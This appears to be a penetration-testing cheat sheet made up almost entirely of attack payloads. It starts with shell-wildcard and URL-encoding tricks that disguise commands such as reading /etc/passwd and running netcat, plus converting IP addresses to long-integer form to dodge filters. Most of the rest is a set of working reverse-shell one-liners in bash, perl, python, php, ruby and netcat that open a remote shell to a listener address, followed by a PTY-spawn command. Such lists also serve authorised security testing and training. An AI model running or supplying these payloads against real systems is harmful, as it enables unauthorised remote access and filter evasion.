# One char wildcard
?
# Multiple char wildcard
*
/bin/ls
/???/?s
/bin/bash
/???/??sh
/bin/cat /etc/passwd
/???/?at /???/????w?
# URL encoded
%2f???%2f??t%20%2f???%2fp??s??
/usr/bin/nc 127.0.0.1 80
/???/???/n? 127.0.0.1 80
# Ip in long format
/???/???/n? 2130706433 80
nc -e /bin/bash 127.0.0.1 1337
/???/n? -e /???/b??h 2130706433 1337
echo /etc/passwd
echo /*/*ss*
Convert Dezimal IP to long by hand:
64.233.187.99
64*2^24 + 233*2^16 + 187*2^8 + 99
= 1089059683
127.0.0.1
127*2^24 + 0*2^16 + 0*2^8 + 1
= 2130706433
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Spawn a PTY (Pseudo Teletype) Shell with python:
python -c 'import pty; pty.spawn("/bin/bash");'